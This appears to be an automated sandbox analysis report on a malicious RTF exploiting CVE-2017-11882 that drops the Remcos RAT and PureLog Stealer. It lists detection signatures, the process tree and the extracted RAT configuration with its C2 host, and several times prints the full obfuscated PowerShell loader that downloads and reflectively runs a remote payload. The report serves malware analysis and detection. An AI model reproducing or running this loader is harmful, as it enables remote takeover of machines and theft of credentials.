
Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf

Overview

General Information

Sample name: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf
Analysis ID: 1519296
MD5: 9cb9142659aa46876659d869b522a616
SHA1: 7704e37a8ec272ec3a8f24c2f56e8e0c0071a7fe
SHA256: d9c48d17fccf4c215621206bf43697a8e56120e21a6fe8669ec36a5be8e05a43
Tags: rtf

Detection

Remcos, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Maps a DLL or memory area into another process
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3268 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3352 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3520 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 3792 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3964 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3972 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3980 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3988 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xngebzmuliqlvokkyghpdzaillbyo" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3996 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ahlxcrfozqiqgugoprcrgenrualhhmmku" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2636 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\muezvmgbhtns" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2464 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1964 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjfueylyjgoymkoaaythvh" MD5: 8FE9545E9F72E460723F484C304314AD)
    • EQNEDT32.EXE (PID: 4064 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "authurremc.duckdns.org:14645:1", "Assigned name": "authur", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7B1J99", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen
  • 0x1692:$obj2: \objdata
  • 0x16ac:$obj3: \objupdate
  • 0x166d:$obj6: \objlink
Source | Rule | Description | Author | Strings
00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000002.385255527.00000000063D0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
(5 of 22 entries shown)
Source | Rule | Description | Author | Strings
8.2.powershell.exe.3cf0b60.1.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
8.2.powershell.exe.3cf0b60.1.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
8.2.powershell.exe.3cf0b60.1.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
8.2.powershell.exe.3cf0b60.1.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x690b8:$a1: Remcos restarted by watchdog!
  • 0x69630:$a3: %02i:%02i:%02i:%03i
8.2.powershell.exe.3cf0b60.1.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6317c:$str_b2: Executing file:
  • 0x641fc:$str_b3: GetDirectListeningPort
  • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x63d28:$str_b7: \update.vbs
  • 0x631a4:$str_b9: Downloaded file:
  • 0x63190:$str_b10: Downloading file:
  • 0x63234:$str_b12: Failed to upload file:
  • 0x641c4:$str_b13: StartForward
  • 0x641e4:$str_b14: StopForward
  • 0x63c80:$str_b15: fso.DeleteFile "
  • 0x63c14:$str_b16: On Error Resume Next
  • 0x63cb0:$str_b17: fso.DeleteFolder "
  • 0x63224:$str_b18: Uploaded file:
  • 0x631e4:$str_b19: Unable to delete:
  • 0x63c48:$str_b20: while fso.FileExists("
  • 0x636c1:$str_c0: [Firefox StoredLogins not found]
(5 of 22 entries shown)

Exploits

Source: Network Connection; Author: Joe Security; Data: DestinationIp: 185.29.10.52, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3352, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3352, TargetFilename: C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Network Connection; Author: Max Altgelt (Nextron Systems); Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3352, Protocol: tcp, SourceIp: 185.29.10.52, SourceIsIpv6: false, SourcePort: 80
Source: Process started; Author: Thomas Patzke; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250Z
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250Z
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250Z
